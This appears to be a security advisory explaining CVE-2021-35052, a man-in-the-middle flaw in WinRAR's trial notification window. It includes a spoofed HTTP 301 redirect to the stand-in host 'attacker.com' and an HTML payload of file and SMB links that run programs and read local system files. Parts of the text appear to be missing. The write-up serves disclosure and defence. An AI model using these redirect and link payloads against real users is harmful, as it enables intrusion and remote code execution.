In this article we discuss a vulnerability in the trial version of WinRAR which has significant consequences for the management of third-party software. This vulnerability allows an attacker to intercept and modify requests sent to the user of the application. This can be used to achieve Remote Code Execution (RCE) on a victim’s computer. It has been assigned the CVE ID – CVE-2021-35052.
WinRAR is an application for managing archive files on Windows operating systems. It allows for the creation and unpacking of common archive formats such as RAR and ZIP. It is distributed as trialware, allowing a user to experience the full features of the application for a set number of days. After which a user may continue to use the applications with some features disabled.
This was surprising as the error indicates that the Internet Explorer engine is rendering this error window.
After a few experiments, it became clear that once the trial period has expired, then about one time out of three launches of WinRAR.exe application result in this notification window being shown. This window uses mshtml.dll implementation for Borland C++ in which WinRAR has been written.
Microsoft MSHTML Remote Code Execution Vulnerability
We set up our local Burp Suite as a default Windows proxy and try to intercept traffic and to understand more about why this was happening and whether it would be possible to exploit this error. As the request is sent via HTTPS, the user of WinRAR will get a notification about the insecure self-signed certificate that Burp uses. However, in experience, many users click “Yes” to proceed, to use the application.
Looking at the request itself, we can see the version (5.7.0) and architecture (x64) of the WinRAR application:
GET /?language=English&source=RARLAB&landingpage=expired&version=570&architecture=64 HTTP/1.1 Accept: */* Accept-Language: ru-RU UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3) Host: notifier.rarlab.com Connection: close Cookie: _wr=; _gid=; _ga=
Modifying Responses to The End User
Next, we attempted to modify intercepted responses from WinRAR to the user. Instead of intercepting and changing the default domain “notifier.rarlab.com” responses each time with our malicious content, we noticed that if the response code is changed to “301 Moved Permanently” then the redirection to our malicious domain “attacker.com” will be cached and all requests will go to the “attacker.com”.
HTTP/1.1 301 Moved Permanently content-length: 0 Location: http://attacker.com/?language=English&source=RARLAB&landingpage=expired&version=570&architecture=64 connection: close
Remote Code Execution
This Man-in-the-Middle attack requires ARP-spoofing, so we presume that a potential attacker already has access to the same network domain. This will put us into Zone 1 of the IE security zones. We attempted several different attack vectors to see what is feasible with this kind of access.
<a href="file://10.0.12.34/applications/test.jar">file://10.0.12.34/applications/test.jar</a><br> <a href="\\10.0.12.34/applications/test.jar">\\10.0.12.34/applications/test.jar</a><br> <a href="file://localhost/C:/windows/system32/drivers/etc/hosts">file://localhost/C:/windows/system32/drivers/etc/hosts</a><br> <a href="file:///C:/windows/system32/calc.exe">file:///C:/windows/system32/calc.exe</a><br> <a href="file:///C:\\windows\\system.ini">file:///C:\\windows\\system.ini</a><br>
The code above depicts the spoofed response showing several possible attack vectors such as running applications, retrieving local host information, and running the calculator application.
Most of the attack vectors were successful but it should be noted that many result in an additional Windows security warning. For these to be a success, the user would need to click “Run” instead of “Cancel”.
However, there are some file types that can be run without the security warning appearing. These are:
Remote code execution is possible with RAR files in WinRAR against versions earlier than 5.7. This can be done via a well-known exploit, CVE-2018-20250.
One of the biggest challenges an organization faces is the management of third-party software. Once installed, third-party software has access to read, write, and modify data on devices which access corporate networks. It’s impossible to audit every application that could be installed by a user and so policy is critical to managing the risk associated with external applications and balancing this risk against the business need for a variety of applications. Improper management can have wide reaching consequences.